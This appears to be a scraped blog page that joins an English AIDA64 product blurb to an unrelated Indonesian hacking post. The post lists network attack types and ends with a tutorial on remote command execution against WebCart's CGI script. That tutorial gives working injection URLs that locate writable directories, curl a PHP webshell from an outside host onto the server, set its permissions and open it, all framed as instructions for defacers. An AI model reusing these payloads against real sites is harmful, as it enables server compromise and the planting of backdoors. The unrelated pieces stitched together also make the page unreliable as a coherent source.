AIDA64 Extreme Edition is a streamlined Windows diagnostic and benchmarking software for home users. AIDA64 Extreme Edition provides a wide range of features to assist in overclocking, hardware error diagnosis, stress testing, and sensor monitoring. It has unique capabilities to assess the performance of the processor, system memory, and disk drives. AIDA64 is compatible with all current 32-bit and 64-bit Microsoft Windows operating systems, including Windows 7 and Windows Server 2008 R2

CPU, memory and disk benchmarks

AIDA64 implements a set of 64-bit benchmarks to measure how fast the computer performs various data processing tasks and mathematical calculations. Memory and cache benchmarks are available to analyze system RAM bandwidth and latency. Processor benchmarks utilize MMX, 3DNow! and SSE instructions, and scale up to 32 processor cores. For legacy processors all benchmarks are available in 32-bit version as well. AIDA64 Disk Benchmark determines the data transfer speed of hard disk drives, solid-state drives, optical drives, and flash memory based devices.

Temperature, voltage and cooling fan monitoring AIDA64 supports over 150 various sensor devices to measure temperatures, voltages, fan speeds, and power draw. Measured values can be displayed on System Tray icons, OSD panel, Sidebar Gadget, and Logitech G15/G19 Gaming Keyboard LCD. The values can also be logged to file or exported to external applications such as RivaTuner or Samurai. AIDA64 can also alarm the user when it detects overheating, over-voltage, or cooling fan failure.

Hardware diagnostics

AIDA64 has the most accurate hardware detection capabilities in its class, to provide detailed information on the computer internals without the need to open it up. The hardware detection module is strengthened by an exhaustive hardware database holding over 120,000 entries. Additional modules are available to overview processor frequencies, check CRT and LCD display status, and stress the system to reveal potential hardware failures and thermal issues.

Software and operating system analysis

AIDA64 provides over 50 pages of information on installed programs, software licenses, security applications, and Windows settings. List of started processes, services, DLL files, startup programs, and visited web pages is also available.

Download Here

Filed under: Download

Tehnik yang sering digunakan para hacker dan defacer

xnockout — Mon, 04 Apr 2011 20:59:33 +0000

Cara cara seoarang hacker menembus ataupun menyusup dan juga merusak suatu website adalah sebagai berikut.Teknik teknik itu antara lain:

1. IP Spoofing
2. FTP Attack
3. Unix Finger Exploits
4. Flooding & Broadcasting
5. Fragmented Packet Attacks
6. E-mail Exploits
7. DNS and BIND Vulnerabilities
8. Password Attacks
9.Proxy Server Attacks
10. Remote Command Processing Attacks
11. Remote File System Attack
12. Selective Program Insertions
13. Port Scanning
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
15. HTTPD Attacks

1. IP Spoofing

IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.

IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.

2. FTP Attack

Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.

Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack (menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.

3. Unix Finger Exploits

Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.

Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.

4. Flooding & Broadcasting

Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.

Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.

5. Fragmented Packet Attacks

Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol.

6. E-mail Exploits

Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).

7. DNS and BIND Vulnerabilities

Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).

8. Password Attacks

Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.

Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing.

9.Proxy Server Attacks

Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.

10. Remote Command Processing Attacks

Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.

11. Remote File System Attack

Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file.

12. Selective Program Insertions

Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor.

13. Port Scanning

Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet

Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.

15. HTTPD Attacks

Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.

HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker akses ke command prompt.

dan yang satu ini adalah bonus dari saya nih nemu tadi waktu lagi lari2 di mbah google

Dalam ini saya akan menjelaskan cara kerja Remote Command Execution atau biasa disebut Remote Arbitary Command Execution

adalah bug yg memungkinkan attacker untuk menjalankan command – command secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi. salah satu applikasi web yang memiliki vuln RCE / ACE ini adalah WebCart.

ex vuln: webcart/webcart.cgi?CONFIG=

Bagaimana mengexploitasi bug RCE ini ?

Bug RCE pada dasarnya mengambil sebuah input melalui variable yg memiliki bug tersebut. dalam hal ini “CONFIG”.

Nah, dari variable yg di ambil inilah kita bisa menyisipkan command – command ke server. Command di awali dan di akhiri dengan karakter pipa “|”. Command letakkan setelah nilai variable yg di ambil server. biarkan value ini tetap ada, karena mungkin terjadi error kalau tidak ada isinya.

ex:

http://www.RCE.com/webcart/webcart.cgi?CONFIG=path.html|[command]|&

melalui bug RCE, kita bebas menjalankan command – command ke server. Jadi mudah saja,semisal kita ingin memasukan webshell ke target tinggal downloadkan webshell ke server. dengan perintah : wget,lwp-download,curl, dll

3. Langkah Kerja

3.1. mencari dir yg bisa di tulisi / writable

Code:

http://www.RCE.com/webcart/webcart.cgi?CONFIG=path.html|find+./+-type+d+-perm+777|&

‘images/galley’ misal ini yg keluar. maka susupkan webshell kesini

3.2. memasukan webshell. dalam contoh menggunakan perintah curl.

Code:

http://www.RCE.com/webcart/webcart.cgi?CONFIG=path.html|curl+-o+images/gallery/myshell.php+http://www.shellkamu.com/evil.php|&

http://www.RCE.com/webcart/webcart.cgi?CONFIG=path.html|chmod+755+images/gallery/myshell.php|&

3.3. webshell telah terupload

Code:

http://www.RCE.com/webcart/images/gallery/myshell.php

NB: inti dari tutorial ini [ Command - Comand di awali dan di akhiri dengan karakter pipa "|". ]

sumber: http://junkelse.blogspot.com

sumber lain bisa di dapat di SANA (http://www.milw0rm.com/papers/260), SITU (http://www.milw0rm.com/exploits/9556), SONO (http://www.milw0rm.com/papers/369). dll.

Filed under: Cracking, Hacking, Info Tagged: Deface, E-mail Exploits, Exploits, Flooding, Ftp Attack, Hacker, Hacking, Ip Spoofing, Password Attacks, Proxy Server Attacks, Remote